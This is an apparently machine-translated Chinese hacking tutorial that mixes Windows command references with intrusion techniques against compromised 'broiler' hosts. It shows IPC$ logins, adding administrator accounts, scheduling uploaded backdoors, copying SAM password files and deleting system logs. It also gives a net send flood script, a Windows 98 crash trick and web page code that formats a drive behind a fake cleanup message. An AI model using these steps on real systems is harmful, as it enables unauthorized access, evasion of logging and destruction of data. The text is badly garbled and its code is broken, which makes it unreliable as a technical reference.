cmmgr32. . Exe> Connection Manager Connection Manager. .
Cmmon32. Connection Manager Monitor .exe > connection manager monitor.
cmstp. . Exe> Connection Manager Profile Manager Connection Manager configuration file setup. .
Comclust. cluster server .exe > about cluster.
comp. . Exe> ComClust Add, Remove, or Join a cluster. . Compare two files and set the contents of the *. .
compact。.exe > Displays or alters the compression of files on NTFS partitions。. Displays or alters the NTFS partition on the compression state of files.
conime. . Exe> Console IME IME console. .
Starts .exe > control. the control panel the control panel.
convert. . Exe> Convert File System to NTFS convert file system to NTFS. .
Convlog. Converts .exe > MS IIS log files into the IIS log file format to NCSA format.
cprofile. . Exe> Copy profiles change display modes. .
Cscript. MS Windows .exe > Scripts Host Version 5. higher this hosted version .1.
csrss. . Exe> Client Server Runtime Process Client Server Runtime process. .
Csvde. .exe Comma Separated Variable > Import/Export Utility to format conversion programs.
dbgtrace. . Exe> and the Terminal Server related. .
dcomcnfg。.exe > Display the current DCOM configuration。. DCOM configuration properties.
dcphelp. . Exe>?. .
Dcpromo. .exe > Promote a domain controller to ADSI AD Setup Wizard.
ddeshare. . Exe> Display DDE shares on local or remote computer DDE share. .
ddmprxy。.exe > 。.
debug. . Exe> Runs Debug, a program testing and editing tool. . Is to DEBUG it! . .
Dfrgfat. Defrag .exe > FAT file system FAT partition on the Disk Defragmenter.
dfrgntfs. . Exe> Defrag NTFS file system NTFS partition Disk Defragmenter. .
Dfs_cmd_. .exe > a Dfs tree configuration configures a DFS tree.
dfsinit. . Exe> Distributed File System Initialization of distributed file system initialization. .
dfssvc。.exe > Distributed File System Server 。.
Above all you learn, I can not say you must become a master, but I guarantee you will not be rookie! Order was a little chaotic, inevitable error, please correct me! . .
1) how the open port:.
Using netstat-a-n command to see! Here are some English stat again, I'll briefly about what they represent in English specific. .
LISTEN: listening on TCP port from the distance of connection requests.
SYN-SENT: re-send the connection request matches the connection request to wait. .
SYN-RECEIVED: to receive and send a connection request is awaiting confirmation for the connection request.
ESTABLISHED: on behalf of an open connection. .
FIN-WAIT-1: wait for the remote TCP connection interrupt request, or a previous connection interrupt request confirmation.
FIN-WAIT-2: waiting for connection from the remote TCP interrupt request. .
CLOSE-WAIT: wait for the local user connection interrupt request.
CLOSING: wait for the remote TCP connection is lost on the confirmation. .
LAST-ACK: wait for the original sent to the remote TCP connection interrupt request confirmation.
TIME-WAIT: wait for enough time to make sure the remote TCP received the confirmation link interrupt request. .
CLOSED: no connection state.
2) How to get an IP address, host name? . .
Use ping-a ip command to see the first row! pinging back ' ip ' in front of the English language is the other host name!.
Similarly, using ping machine_name can be each other's ip. .
Get a Web site's IP address is: ping www. ***. .com.
Example, want to know sohu the ip, on the use of ping http://www. . Sohu. . Com / to see on it. .
Incidentally: If returns: Reply from *. *. *. *: TTL expired in transit, Oh, on behalf of the TTL (life cycle) expired in transit.
What does that mean? Let me explain! . .
This problem occurs for two reasons: 1) TTL value is too small! TTL value is less than you and each other through the router between hosts. Quantity 2) router, the router is too much more than the number of TTL value!.
Oh, in fact, these two points is a meaning! Just a different view! . .
3) how to view native IP address?.
You can use ipconfig to see! . .
You can then start menu in Windows, run, enter winipcfg, similarly you can see their own ip.
ipconfig command followed if the rate of one parameter / all, then you can get more detailed information, such as DNS, Gateway, etc ... .... .
4) and then use the net time command has encountered some error code, how to view the corresponding error messages?.
Use the command net helpmsg erorr_code to see on it. .
For example, error code is: 88.
The View command: net helpmsg 88 The following are the error code displayed in Chinese! . .
5) using telnet to connect to other host, want to get some system information, and in what order?.
set command can be a very good collection of the information you need to complete the task! . .
Method: directly enter set cmd (telnet peers, are directly set on the can-then get NNNNN much information).
Here again, computername: Oh, course it does What? Host name! . .
OS = Windows_NT: operating system type Oh ~.
path = C: \ perl \ bin \: (perl interpreter position!). .
SystemDrive = c: operating system drive letter!.
USERNAME = coldcrysky currently logged in user using the machine. .
…… 。.
(6) What is the command to track the router? . .
Format: tracert ip tracert.
After the middle lists all the routers list! If re-exposure of these routers outside the firewall, then you can see the IP routing Oh ~ Oh (here it also involves another question: Why should Luyou placed behind a firewall? Because it mainly two things: 1) protection of the router ! Because now more and more attacks and the invasion has already begun targeting the router directly to the routing of the ~ if left exposed, Oh, it is very dangerous! Was a very bad DoS ah ~ Oh, so be on the firewall inside; 2) to reduce the burden on the router! If all of the filtering are all above the pressure in the router, Oh, the burden on the router too! ). .
Of course, use pathping can also achieve the same result as with tracert! format!.
7) a brief cookie! . .
Cookie, also known as cookies.
Its role: Record number of visitors to the information. For example, you login using cookie records the number of times this page, enter the information once landing ... .... .
The most common is to visit the Forum (mailbox), often enter the first letter is often below shows all of the native land Forum (mailbox) username? hehe, this is the role of cookie!.
Administrator of the cookies in the directory you can see a lot of notes in this document, right? These are the cookie, despite the encryption, but a close look, then, still be able to see sensitive information! Moreover now view the cookie already have special software! Using such software, your privacy will not guarantee oh. .
So, how do you clear the cookie? "in General, the Internet option in the General tab to see a delete cookies button click you can clear away ~.
In addition, also in the internet options in the Content tab button to automatically find, to which four are selected! Then click Clear Forms, Clear Passwords ~. .
, Then .swf. open the view, I believe you will find all you need FLASH!), well, the topic ?went on to say: these files are the site of a page of records, you can directly delete!.
In addition, there is no total ban cookie method? . .
Oh, of course! in IE Internet options, Privacy tab found!, there drag the slider to the top, side reads: block all cookies, Oh, is not it?.
Another method: Find the Windows directory under the cookies directory! Txt file to remove all inside! Finally, should be only one index. . Dat files! After this folder can be set to read only a ~. .
However, the prohibition to use cookies, most of the Forum are not the normal landing! hehe, but the prohibition is not prohibited depends on your own ~.
8) Installation of 2000 when the slow speed will be particularly special in particular, how to speed up installation of speed? . .
Mounted in DOS, you should start with 98 CD to boot the system! "and then follow the following method to do it, you can improve the speed of installation:.
g: \> cd windows ------- assume G to drive the installation of 98 windows directory! . .
G:\windows > smartdrv-------load the smartdrv program! after loading, with no hint information! so long as it does not return an error that is loaded when the installation is successful ~ 2K, speed will quickly Oh ~.
9) Windows2K password forgotten how to enter the system? . .
Windows2K user configuration information and passwords stored in the SAM file!: c:\winnt\system32\config directory! just delete this file ~.
In addition, in c: \ winnt \ repair directory also has a SAM file (this is the former backup!) If you visit when broilers, copy in front of the SAM file in that directory, you will find COPY not down! Oh, why? Because the running of the 2K system will protect the SAM file you ah ~ this time this can be a COPY! . .
Less than 10) ping, tracert, but cannot use nbtstat to display some information from each other, and why?.
As tracert and ping commands using ICMP protocol! The nbtstat netbios port through the other side to get the other host of information! Using UDP and TCP protocol! If the person only made the agreement only prohibited ICMP, then system information obtained by this command is normal! . .
11) telnet looks after, how to open a shared?.
Open sharing of command is as follows: net share c = c: \ winnt \ system back to share the success. .
Directly after use to access each other's \\ip\c system directory ~ delete shared.
share c / del command on it. .
12) how to determine the specific operating system versions of each other?.
First of all, with the ver command to see the other's version! . .
If a is 5.00. .2195, 2 k, 5. .2600 for .1. XP.
From here you can distinguish them in the end is a ~ 2K or XP following a more specific distinction! . .
2 k pro and distinction: svr version.
Under the telnet, net shart View start of service ~ if the enemy opens the Terminal Services service, basically you can determine the version of the above for the svr ~ if not open, compared to pro! (There are three specific methods, as in the forums a few days ago I had dark circles back a ~ so ~ will not repeat here). .
XP pro and home Edition of distinction.
home edition is unable to install iis in! Therefore, it can be judged in the end through the iis service is a home edition or pro ~. .
Of course, if someone is a pro, but IIS is deleted (deactivated), there is no way to judge a ~ hehe.
13) How to view the 98 random start procedure? . .
In Win98, there is a utility to configure the program (msconfig), Chinese name is: the system configuration utility, called method in: start-to-run type msconfig-, inside, there is a Startup tab, click to see a lot of starts program, if preceded by a hook that starts randomly start, cancel, then it is put in front of the wartime London became integral to get rid of it ~ (if in the view to some unknown boot file--for example, there is no file path, or if no file name, it is best to remove it from the start because most likely released!).
Except, there are config. . Sys, autoexec. . Bat, system. . Ini, win. . Ini several options card, they correspond to these files! But here it is more convenient view! . .
14) set up a BIOS password, but I forgot what.
If you can access Windows, then, can look at the two software biospwds and cmospwd see ~. .
Also use DEBUG method.
Brief two:. .
1)-o 70 16。.
-O 71 13. .
-q 。.
2)-o 70 16. .
-o 71 16。.
-Q. .
Another method: copy method.
copy con cmos. . Com. .
Enter the following 10 characters: alt + 176, alt + 17, 230, alt + p, alt + 176, alt + 20, 230, alt + q, alt + 205, space, and then press F6 and enter, exit, run this cmos. .com programs can ~.
Well, if Windows can not access how to do? . .
Briefly describe two approaches:.
1) Use common password:. .
Award Bios password: j256, LKW-PPETER, wantgirl, EBBB, Syxz, AWARD? SW,AWARD_SW,j262,HLT SER,SKY_FOX,BIOSTAR,ALFARO_ME,lkwpeter,589721,awkard,h996,CONCAT,589589 。.
AMI bios passwords: AMI, BIOS, PASSWORD, HEWITT RAND, AMI_SW, LKWPETER, A. . M. . I. .
This is a common password, try ~.
If not, can use the CMOS discharge:. .
Is the battery on the motherboard and wait a while and then plug it up ~.
15) How to make 98 blue made a bomb? . .
Well, this is the other day a friend ask me above QQ, the consolidation of all of a sudden come to think of it, write about Nice ~.
First, open Word, then select the Insert menu, object, time, packing pop-up window object, then this window, click Import, casually looking for a text or a program you can! After the point: the Edit menu. Here select the command line, the emergence of a command line window, in which consultations c: \ con \ con, click save, complete, and then point edit the package copy package to a place he casually copied down, and then see is what a piece of fame! To the file a name, Oh, that poor guy passed it, waiting for him blue, dropped calls! . .
(This command line, you can insert many commands, not necessarily have to use this blue screen vulnerability Oh ~ 98), by the way: this is new technology, and the name of this technique is called: pieces of the object. Oh, memory fragmentation fragmentation??!: the suffix is the his. .shs! we say this because a friend is not yet known to be a consolidation! the friends do not know know look, I know of a friend when you review a ~ in addition, do not use this method to do damage!!.
16) How to re-process the command line to kill each other? . .
。.
At this time, a friend asked, that then the command line to see the process? Oh, this use of the system comes with a back door tool: just say again that directory, and a tool called tlist name can tell is to see what's right? Use simpler! Direct input tlist pid can get a list of event formation process of the ~. .
The other machines if you do not install both programs? that's OK, you're putting your operating system drive letter following programfiles\support tools directory below the two corresponding exe file upload into each other's winnt\system32 directory! hehe ~.
17) The last time that the ping of the basic usage, the talk about the ping command parameters! . .
This is the focus of this issue set whether bird! or old birds, you can ensure you really well acquainted with these parameters? probably not!, or have a look!..
This is the TCP / IP protocol in one of the most useful commands. .
It to another system to send a series of packets, the system itself and sends back a response, this utility is very useful to find the remote host, it returns results that are accessible to the host, host machine sends a return packet..
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]. .
[-r count] [-s count] [[-j host-list] [-k host-list]] 。.
[-W timeout] destination-list. .
Options: 。.
-T Ping the specifed host until interrupted. . (Unless the person suspended, or has been ping down). .
-A Resolve addresses to hostnames. (IP to hostname).
-N count Number of echo requests to send. . (To respond to the number of requests). .
-L size Send buffer size. (packet of size).
-F Set Don `t Fragment flag in packet. . (No packet fragmentation). .
-I TTL Time To Live. (time).
-V TOS Type Of Service. . (Service type). .
-r count Record route for count hops。.
-S count Timestamp for count hops. .
-j host-list Loose source route along host-list。.
-K host-list Strict source route along host-list. . (More stringent ... ... Oh, how good translation ... ... forget, placed it). .
-W timeout Timeout in milliseconds to wait for each reply. (timeout).
For example we may know of a command # ping-f-s 65000 ***. .***。 .***。 .*** Or so-called ping dead before the stage of mold you guys used when the country commands (of course this will only result in our own network congestion). .
In fact, this command is used to look at each other's response speed, if how ping results are request time out. Then I'm afraid you have no need for you to find the host, it is not within the range.
18) How to view the machine's DNS server? . .
Ipconfig can in fact (Oh, last introduced the command), in addition, you can also use a command: and then enter cmd into the netsh, netsh > prompt, and then enter the ip into: int interface ip dump > then enter it again, this time to appear on the screen of the configuration for the current connection.
Netsh in the end must be brief here is what to use! This command is rather complicated, he includes a lot of sub-commands, so here explain only part of the command:. .
1) view the native IP: first type the netsh, netsh > prompt, enter: interface after a CR carriage return and then after ip:: show address carriage return so that you can see the current connection's IP address and subnet mask. (In fact, rather than the command ipconfig is simple, as ipconfig/all comprehensive).
2) modify the network configuration: then the above command, we use: set address name = "Local Area Connection" source = static addr = 192. .168. .0. .200 Mask = 255. .255. .255. .0, Thus modify the current IP address, use the show address to see (or use the ipconfig). .
3) displays a complete network configuration scripts:.
Just said, the first command displays the information as ipconfig / all-round, do not worry, netsh and then print show the network configuration, or have their own characteristics! For example: re-interface ip> state, enter: dump, will display a list to show all local connections (regardless of whether you use the ~) and netstat-an is not exactly the same! . .
This is a simple introduction to netsh and most basic usage! I hope you are able to master! you can also enter? to view help! (to netsh > prompt, you can view help AH ~).
19) Chicken on the part of the file can not be deleted, how do? . .
If the folder is read-only, appear the words "access denied! this time, we can then del command followed by the/f parameter to delete!.
20) to say that can restrict user login time orders! . .
Then the net command, you can implement such a feature!:.
If we wish to make: coldcrysky the user and then Sunday to the Book of the 8 o'clock to 16 o'clock you can visit between, use this command:. .
net user coldcrysky /timesunday-monday,08:00-16:00 。.
After using net user coldcrysky command to view the landing time constraints, we can see that we have set the time (because it is Chinese, it is easy to understand, I do not much nonsense). .
Here, to remind you: command: Sunday is the beginning of the week as Monday!!! not!.
Light said how to set, if you want to restore back to how to do? (That is to restore to the default state, any time can visit the state). .
Look at me: net user coldcrysky/time: all--so that it can be a ~.
22) How to remove windows2K the default contribution? . .
First open Notepad, enter the following:.
net share c $ / delete. .
net share d$ /delete。.
net share e $ / delete. .
net share f$ /delete。.
net share g $ / delete. .
net share ipc$ /delete。.
net share admin $ / delete. .
Here's a c $, d $, e $ ... is to represent the default share of letter-and a few that you can set several ~.
Click Save after the batch file (suffix: bat file!)! To start the group can be a ~. .
23) 139 ports and usage.
Oh, to write this post because I promised a friend back to the role of the port 139 to the ... ... first make two points: 1) Do not use the methods mentioned in the posts engage in vandalism! 2) Oh, many people may already know the 139 ports that use the ~ This just want to play a serve as a stimulus! . .
Nonsense is not to say ~:.
If you are using NT host, then you have to pay attention to it! . .
Restart NT host as follows:.
1: Net use \ \ XXX. . XXX. . XXX. . XXX \ ipc $ "password" / user: "username". .
Establish a connection to the IPC.
2: net use H: \ \ XXX. . XXX. . XXX. . XXX \ C $. .
Will the other side of the c drive mapped to your own h disc.
3: copy c on h: \ reboot. . Bat. .
Iisreset /reboot。.
CTRL + Z. .
On the other side of a C disk to restart the machine.
4: net time \ \ XXX. . XXX. . XXX. . XXX. .
Other machine time.
5: at \ \ XXX. . XXX. . XXX. . XXX restart of the time c: \ reboot. . Bat. .
Set each restart time!.
6: at \ \ XXX. . XXX. . XXX. . XXX. .
View the tasks above, whether to add the task.
7: the other side to restart the good of the ~. .
Above the third step is only for Win2K, Nt requires intention specified in the restart procedure, we can write an .exe reboot. instead of .bat reboot., code is as follows:.
# Include "stdio.. H". .
#include "windows。.h"。.
int main (). .
{。.
File: / / define restart when the message sent to all users. .
LPSTR msg="Reboot Tool By LionHook\nhttp://www。.xici。.net";;。.
File: / / try to restart the simplest API functions. .
if(ExitWindowXXX(EWX_REBOOT。.0))return TRUE;。.
if (ExitWindowXXX (EWX_REBOOT | EWX_FORCE, 0)) return TRUE;. .
File://since the previous reset was not successful, you need to adjust this process privileges.
HANDLE hToken;. .
TOKEN_PRIVILEGES tkp;。.
if (! OpenProcessToken (GetCurrentProcess (), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, & hToken)) return FALSE;. .
File://Gets the SE_SHUTDOWN_NAME privilege is reset.
LookupPrivilegevalues (NULL, SE_SHUTDOWN_NAME, & tkp.. Privileges [0].. Luid);. .
tkp。.PrivilegeCount=1;。.
tkp. . Privileges [0]. . Attributes = SE_PRIVILEGE_ENABLED;. .
AdjustTokenPrivileges(hToken,FALSE,&tkp,0,(POTKEN_PRIVILEGES)NULL,0);。.
File: / / judgment 9X NT kernel or kernel, select a different way. .
if(!GetVersion()& 0x80000000))。.
InitiateSystemShutdown (NULL, msg, 20, TRUE, TRUE);. .
else if (!ExitWindowXXX(EWX_REBOOT,0))。.
if (! ExitWindowXXX (EWX_REBOOT | EWX_FORCE, 0)). .
return FALSE;。.
return TRUE;. .
Well, again, don't use the method mentioned in this article, be careful sabotage policeman hit PP ~ hehe.
24) using a batch file to create a record 3389 Lander recorder information. .
Because the default Terminal Service there is no logging, can only rely on his system log, System log can record some big action (open or closed), how to write a batch file to be 3389 port procedures? is simple:.
Create a batch file: read as follows:. .
@echo off。.
date / t>> c: \ 3389log. . Txt. .
:TS3389。.
time / t>> c: \ 3389log. . Txt. .
netstat -an | find "3389" |find "ESTABLISHED" >>c:\3389log。.txt。.
goto: TS3389. .
Save!.
If someone with your 3389 login to your machine, Oh, under the c drive there 3389log. . Txt this file! Log records the same day, there is connection time ... ... information ~ ~ Ha ha began to fight back. .
25) network commands section.
A, NET command:. .
IPC connect: net use other format IP\ipc $ \\ "password" user: "user name" and "the establishment of IPC connect ~ '.
net use \ \ other IP \ ipc $ / delete ~ 』『 disconnected. .
The following actions will need to connect to other host may!!!.
net user coldcrysky xyz / add 『target host in the connection to add a user named COLDCRYSKY password WYZ user』. .
Net localgroup Administrator coldcrysky/add ' to the user named coldcrysky joined the ADMIN group-think of the permissions! ^ _ ^ '.
net use z: \ \ other IP \ C $ 『into each other's C drive mapped Z-disc-based machines - may need to change the map according to letter! 』. .
Net start TELNET telnet ' open '.
net user guest / active: yes GUEST 』『 activation. .
Net user guest coldcrysky ' to change GUEST password COLDCRYSKY '.
B, AT command:. .
To view the remote machine: net time \\ other IP.
To add a new task:. .
At the time the other IP \\ ' filename to upload their own backdoors in development time, ease into broiler! '.
C, TELNET command:. .
Telnet IP port ' of each other without I say??? ".
D, FTP command:. .
Login: ftp other sites (IP addresses).
Upload files: get files on the local file store the full path the full path of the other party. .
Downloads: put the full path to each file stored file paths for native.
E, COPY command:. .
After establishing a connection (in particular IPC $ connection, very useful command oh ~).
⑴ copy index. . Htm \ \ 127. .0. .0. .1 \ C $ \ index. . Htm. .
' Index .htm will be native. copying a file to the .0 .0.127.. .1 c disk, if you want to put into each other's NT directory, then change to the admin $ C..
⑵ copy \ \ 127. .0. .0. .1 \ Admin \ repair \ sam_ c: 『remote machine database files are copied to the machine under the root directory C』 F, SET command:. .
Mainly used in the analysis of basic information on the target computer for specific methods used! find file!.
G, NBTSTAT command:. .
Nbtstat-A other IP (this A uppercase).
『In which the show <037> in front of the computer name is English or digital! Of course, you can use PING-A way to see the other ip host name of the other side! The same effect! ! ! 』. .
H, the SHUTDOWN command:.
『Used to close the』 other NT services command the following format:. .
\\IP address t:20 shutdown.
『Close automatically after 20 seconds the other NT service! As a greater impact on other machines, used with caution! ! ! 』. .
I, the DIR command:.
Need I say What? You are not already in the grasp? ? ? (Do not know of or access to relevant information it ~ ~ ~). .
J, ECHO command:.
echo coldcrysky> index. . Htm 『overwrite the original with coldcrysky INDEX. . HTM 』all of the content. .
Echo coldcrysky > index .htm ' >. join the coldcrysky. .htm ' index.
K, ATTRIB command:. .
Change file properties, format:.
Attrib-r index. . Htm 』『 remove the read-only attribute (+ - representing an increase and decrease). .
L, DEL command:.
『Deletion log time with! 』. .
del c:\winnt\system32\logfiles\*。.*。.
del c: \ winnt \ system32 \ config \ *. . Evt. .
del c:\winnt\system32\dtclog\*。.*。.
del c: \ winnt \ system32 \ *. . Log. .
del c:\winnt\system32\*。.txt。.
del c: \ winnt \ *. . Txt. .
del c:\winnt\*。.log 。.
M, PING command:. .
-T: IP ping, know the network is down, or press CTRL + C to end!.
-A: to explain PING IP host name. .
-N count: send ECHO packet count specified, the default is 4!.
26) Here I have to (or had to repeat one command! But before that I want this command to introduce the relevant command a little!). .
I would like to say that the command is: open service and stopping the service net start and net stop.
These two commands have been very familiar with most friends, right? However, to facilitate more rookie Nengkanmingbai mean I have to say, do not look at other articles, so I say a few words: net start is to open service! So, how to open it? For example, we are here to open the telnet service, then under the direct re-2K, enter cmd: net start telnet to OK a ~ close a service, then changed to stop the OK to start a ~ but have to pay attention here: you are close The service must be turned on the service! ! ! Seems to be a nonsense. .
OK, with this premise, the introduction below to continue: net start and net stop exactly what services can open? it actually requires you to memorize, remember this command: net start and net help help stop, these two will show you what you can turn on the services those ~ ~.
Here for example we have found this service "CLIENT SERVICE FOR NETWARE", then when the command net start and net stop, you must add the service above, "" The reason is because the service name with spaces ! If the service name with no spaces, you can not take the quotation marks! ! ! This is what I highlighted the problem! We must not forget! 『Few days ago to see S8S8. . Net, someone said that black and white New net start and net stop service name must be brought back space is wrong! Understand why now? 』.
27) on the dual system of two issues.
A, how the dual system (98,2000), the Safely Remove 2K? . .
Make a Windows 98 startup floppy disk, and then use it to boot your computer, run the sys command to restore the Windows 98 boot record, and then run the fdisk/mbr restore master boot record, enter the Windows 98 after completion, the winnt directory and delete the information system volumn, and then delete the c drive on boot., bootfont .ini. .bin, ntldr, nydetect. .com and bootsect. .dos files.
B, Windows 98/XP dual boot menu repair. .
1. repair, set in the BIOS to boot from the CD drive. Use the Windows XP installation disc to start the computer, load the necessary driver after Windows XP Setup interface. There are three options:.
(1) to now install Windows XP, please press "Enter" key. .
(2) should use the "recovery console to repair the Windows XP Setup", press "R" key.
(3) To quit Setup without installing Windows XP, press "F3" key;. .
2. Press "R" key, go to the "Microsoft Windows XP (TM) Recovery Console" interface; the recovery console provides system repair and recovery features. The system will search for an installed Windows XP system files, and then displays the search results, and asks "which you want to log on to Windows XP install (to cancel, press Enter)", select 1. . Repair complete, type Exit exit. After rebooting, you will see a long absence, the dual boot menu. And it does not produce waste after the repair of basic documents. .
Because these two issues are very, very popular, so I gathered here ~.
28), said here a few home malicious code: 『not let you put this code to your home page! Just hope that we understand the malicious code, play a protective role better! 』. .
A, loop code:.
『The following code to the page, above results can be achieved』. .
Note: when the containing this code page is click, connect will continuous open the IE browser, until you waste of system resources to 0% ~ only a restart is required for normal use!.
Prevention: disable all ActiveX controls and plug-ins! Because this is a textbook procedure ActiveX ~. .
B, the big picture: terror.
『The following code to the page, above results can be achieved』. .
Note: when you open this page, IE will keep trying to open the explanation, but because the picture is too large to fit in its processing power, so ....
C, Earthquake Death Code:. .
' The following code into the page, you can reach the above effect '.
if (window.. top.. moveBy) (. .
for (i = 1;i < 50; i++){。. 50;="">
for (j = 3; j> 0; j -) (. .
window。.top。.moveBy(0,i);。.
window. . Top. . MoveBy (i, 0);. .
window。.top。.moveBy(0,-i*2);。.
window. . Top. . MoveBy (-i * 2,0);. .
window。.top。.moveBy(0,i);。.
window. . Top. . MoveBy (i, 0);. .
}。.
). .
}。.
Description:. .
Is the name of the device windows9x parsing vulnerability!.
WINDOWS9x of \ con \ con device name resolution could allow the user to attack, it touches 98 crash. Principle: We know, CON is a special device names under DOS, file names are not allowed to do, if we type the following command in DOS: copy coldcrysky. . Txt con, the system will display coldcrysky. . Txt content, if changed to: copy coldcrysky. . Txt> con can not be prompted to copy files to the file itself. Replaced if it con LPT or PRN, the output coldcrysky. .。 Thus, CON represents the file itself, if you use \CON\CON command, it means that the system continues to call the file itself, depending on the system resources rapidly depleted, press CTRL + ALT + DEL to have no chance.
Solution:. .
For 9X system, it is strongly recommended that patched!!! 2000 and XP do not panic ~.
D, format the hard disk: (the most horrible ~ ~ ~ caution!!! Do not for illegal purposes!!! After use if there are any negative effects, at your peril! And typhoid sky 』『 ColdCrySky; random knife pictures of nothing! !!). .
scr,Reset();。.
scr. . Path = "C: \ \ WINDOWS \ \ StartMenu \ \ Programs \ \ Startup \ \ startup.. Htm";. .
scr。.Doc="。.
. ".
WSH。.rUN(`start/m format。.com d:/q/autotest/u`);。.
alert (`IMPORTANT: Windows is removing unused temporary files 。.`);。 .
scr。.write(); 。.
Note: When you browse the web, will startup. . Hta file is written startup folder and delete the temporary files are being prompted to WINDOWS! Actually format your D drive, code: F935DC22-1CF0-11D0-ADB9-00C04FD58A0B corresponds to: Windows Scripting Host Shell Object..Exe is a script-language interpreter, is located in the WINDOWS folder, so it can perform batch file execution WSH script ~.
Solution: 1) update your browser, use the latest browser Internet! . .
2) modify the msdos. .sys, include: Bootmentu = 0 the command line to disable the Startup menu.
3) The right format. . Com renamed. .
4) disable WSH. Specific method: in win98, from Add Remove Programs, click WINDOWS Setup, open the attachment a, Windows SCRIPTING HOST to get rid of the previous options, you can uninstall WSH ~ ~ ~ win2000 and XP users can my computer-tools menu-folder options-select file type, find the VBS FILE option, click VBSCRIPT deleted!.
29) The system comes with the system tools. .
In fact, no matter where you from, what method to find some good tools, may not be as useful as tools for Windows comes with a easy to use (assuming your place just can't go online, and you're not ready for these tools, what should we do? hehe, don't worry, use the following Windows comes with a small tool that can make you twice!).
1, msinfo32. . Exe. .
Located in the C:\Program Files\Common Files.
Microsoft Shared \ Msinfo \ msinfo32. . Exe, display computer system information relating to, the diagnosis can be used to solve problems and view the remote system computer generated system report. .
2, drwatson. .exe-this tool to my Special intimate feeling: the first use of this tool is the big brother watching the LK007 to cool brother's reply, I'll test ~ was very interesting! LK007 worthy! now think of it are admired by ~ ~ ~.
Located at C: \ Windows \ drwatson. . Exe, when an application error when running the process, it will go wrong procedure and wrong memory address of 11 recorded and saved as Windows, Drwatson subdirectories *. . Wlg log files. .
3、sfc。.exe 。.
Located at C: \ Windows \ System \ sfc. . Exe, for the automatic search is changed, deleted or damaged system files. .
4、msconfig。.exe 。.
Located at C: \ Windows \ System \ msconfig. . Exe, start by modifying the way, and what applications run at startup such as system configuration, so as to achieve rapid troubleshooting purposes. .
5、scanreg。.exe 。.
Located at C: \ windows \ command \ scanreg. . Exe (DOS version) and the C: \ windows \ scanregw. . Exe (Windows version) for inspection, repair, backup and restore the system registry and related tools for software configuration files to prevent data from being damaged due to the registry caused by system failure. .
6、vcmui。.exe 。.
Located at C: \ Windows \ vcmui. . Exe, will be covered automatically in the background, the driver backed up, when we installed the new driver is available when it is wrong to recover. .
7、winrep。.exe 。.
Located at C: \ Windows \ winrep. . Exe, automatically collect information about the system and prompts the user for failures to help us prepare a complete "for help," the report, and send it to the technical maintenance personnel, simplified "for help" operation. .
The seven Windows comes with a small program in Start menu-run directly enter the file name (no need to enter the extension) of the program!.
31) the invasion of Several Newly batch Magical! . .
A, simplified IPC $ landing operations: broiler chickens.
Notepad create a name for: ipcruqin. . Bat batch file, as follows:. .
@net use \\%1\ipc$ %3 /u:"%2"。.
@ Echo OK! Successfully establish the connection. .
After that, all in CMD, enter: ipcruqin. IP broiler chickens .bat admin account/password for the user. You can sign up without the need for a big long list of command!.
B, batch bombing of the other computer:. .
Open a Notepad, enter the following in it:.
@ Echo are bombing ... .... .
tart。.
@ Net send% 1% 2. .
@if errorlevel 1 goto over。.
goto start. .
ver。.
@ Echo Sending failed. .
Save it as a bat format file, use: *. .bat (this batch file name) + space + destination IP + space + your say!.
The first, a brief three! So the next opportunity to give you more use of batch files! . .
32) Besides a few very simple DOS commands (Tools):.
A, fport. . Exe - See which ports are those procedures used commands. .
Netstat-B,--see an those ports to the external IP connection. For example here: 23 XX. .XX. .XX. .XX and you do not have to open port 23, huh, huh ... ... also I said?.
C, letmain. . Exe \ \ ip-admin-d - list of the administrators group of the machine the user name to see if there are exceptions. .
D, pslist. .exe-list processes.
E, pskill. . Exe - kill the process, sometimes longer in Task Manager can not terminate the program, then use this tool to stop the process. .
F, .exe login.--lists the current what login again with your machine.
ping command Xiangjie. .
ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [[-j computer-list] | [-k computer-list]] [-w timeout] destination-list 。.
Options:. .
-t Ping the specified host until stopped。.To see statistics and continue - type Control-Break;To stop - type Control-C。.
Non-stop ping the local host, until you press Control-C. .
This feature has no special skills, but can be used with other parameters, the following reference.
-A Resolve addresses to hostnames. .
The computer NetBIOS name resolution.
Example: C: \> ping-a 192. .168. .1. .21. .
Pinging iceblood。.yofor。.com [192。.168。.1。.21] with 32 bytes of data: 。.
Reply from 192. .168. .1. .21: Bytes = 32 time <10ms TTL = 254. .
Reply from 192。.168。.1。.21: bytes=32 time <10ms ttl=254 。. ttl="254">
Reply from 192. .168. .1. .21: Bytes = 32 time <10ms TTL = 254. .
Reply from 192。.168。.1。.21: bytes=32 time <10ms ttl=254 。. ttl="254">
Ping statistics for 192. .168. .1. .21:. .
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds: 。.
Minimum = 0ms, Maximum = 0ms, Average = 0ms. .
From the above we can know IP to 192. .168. .1. computer NetBios name .21 to iceblood. .yofor. .com.
-N count Number of echo requests to send. .
Send count specified Echo packets.
By default, generally only Fasong four data packets, by sending this command can define the number of at measuring network speed very helpful, like I want to test to send 50 packets, the average time for the return of the amount of how much the fastest time, slowest time of the number can be informed by the following:. .
C:\>ping -n 50 202。.103。.96。.68 。.
Pinging 202. .103. .96. .68 With 32 bytes of data:. .
Reply from 202。.103。.96。.68: bytes=32 time=50ms TTL=241 。.
Reply from 202. .103. .96. .68: Bytes = 32 time = 50ms TTL = 241. .
Reply from 202。.103。.96。.68: bytes=32 time=50ms TTL=241 。.
Request timed out. .
……………… 。.
Reply from 202. .103. .96. .68: Bytes = 32 time = 50ms TTL = 241. .
Reply from 202。.103。.96。.68: bytes=32 time=50ms TTL=241 。.
Ping statistics for 202. .103. .96. .68:. .
Packets: Sent = 50, Received = 48, Lost = 2 (4% loss),Approximate round trip times in milli-seconds: 。.
Minimum = 40ms, Maximum = 51ms, Average = 46ms. .
From the above and I'll know to 202. .103. .96. send 50 packets .68, returned 48, two for an unknown reason lost 48 packets which returns the fastest to slowest to 40ms, with an average speed of 51ms 46ms.
-L size Send buffer size. .
Define echo packet size.
In the case of default windows of the ping packet size sent to 32byt, we can define its own size, but there is a size limit is the maximum can only send 65500byt, maybe someone will ask why limit to 65500byt, because Windows series system has a security vulnerability (and perhaps also other systems) is that when the other one to send data packets is greater than or equal to 65,532, the other side is likely to block machine, so Microsoft was to address this security vulnerability limit the size of ping packet.。.
C: \> ping-l 65500-t 192. .168. .1. .21. .
